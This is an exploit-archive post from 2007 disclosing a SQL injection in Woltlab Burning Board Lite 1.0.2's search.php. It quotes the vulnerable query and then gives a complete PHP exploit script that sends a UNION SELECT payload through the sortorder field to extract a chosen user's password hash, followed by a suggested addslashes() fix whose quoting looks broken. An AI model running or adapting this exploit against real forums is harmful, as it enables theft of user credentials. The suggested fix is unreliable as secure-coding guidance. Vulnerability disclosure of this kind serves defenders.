Home / exploitsPDF  

wbb-sql.txt

Posted on 21 December 2007

In Woltlab Burning Board Lite(1.0.2) is a SQL-Injection Vulnerability in file: search.php : Line: 510-515 if(!$savepostids) eval("error("".$tpl->get("error_searchnoresult")."");"); $result=$db->query_first("SELECT searchid FROM bb".$n."_searchs WHERE postids='$savepostids' AND showposts='$_POST[showposts]' AND sortby='$_POST[sortby]' AND sortorder='$_POST[sortorder]' AND userid='$wbbuserdata[userid]' AND ipaddress='$REMOTE_ADDR'"); if($result['searchid']) { header("Location: search.php?searchid=$result[searchid]&sid=$session[hash]"); exit(); } There no addslashes() in $_POST[showposts], $_POST[sortby]. $_POST[sortorder]. == Exploit == <?php $host = $argv[1]; $path = $argv[2]; $searchstring = $argv[3]; $userid = $argv[4]; If ($argc <= 4) { echo "Usage: filename.php [host] [path] [searchstring] [user-id] Examples: php filename.php localhost /wbblite/search.php Computer 1 php filename.php localhost /search.php Board 1 "; die; } $sqlinjecting = "searchstring=$searchstring&searchuser=&name_exactly=1&boardids%5B%5D=*&topiconly=0&showposts=0&searchdate=0&beforeafter=after&sortby=lastpost&sortorder=%27%20UNION%20SELECT%20password%20FROM%20bb1_users%20WHERE%20userid=$userid%20/*&send=send&sid=&submit=Suchen"; $con = fsockopen($host, 80); echo("==Woltlab Burning Board LITE SQL-Injection Exploit founded and coded by NBBN. "); sleep(1); fputs($con, "POST $path HTTP/1.1 "); fputs($con, "Host: $host "); fputs($con, "Content-type: application/x-www-form-urlencoded "); fputs($con, "Content-length: ". strlen($sqlinjecting) ." "); fputs($con, "Connection: close "); fputs($con, "$sqlinjecting "); while(!feof($con)) { $res .= fgets($con, 128); } echo("Well done... "); fclose($con); echo $res; echo "The password-hash is in search.php?searchid=[Hash] "; $the_hash = substr($res,strpos($res,'searchid=')+9,32); echo "Hash: $the_hash "; ?> == Fix == if(!$savepostids) eval("error("".$tpl->get("error_searchnoresult")."");"); $result=$db->query_first("SELECT searchid FROM bb".$n."_searchs WHERE postids='$savepostids' AND showposts='.addslashes($_POST[showposts]).' AND sortby='.addslashes($_POST[sortby]).' AND sortorder='.addslashes($_POST[sortorder]).' AND userid='$wbbuserdata[userid]' AND ipaddress='$REMOTE_ADDR'"); if($result['searchid']) { header("Location: search.php?searchid=$result[searchid]&sid=$session[hash]"); exit(); }

 

TOP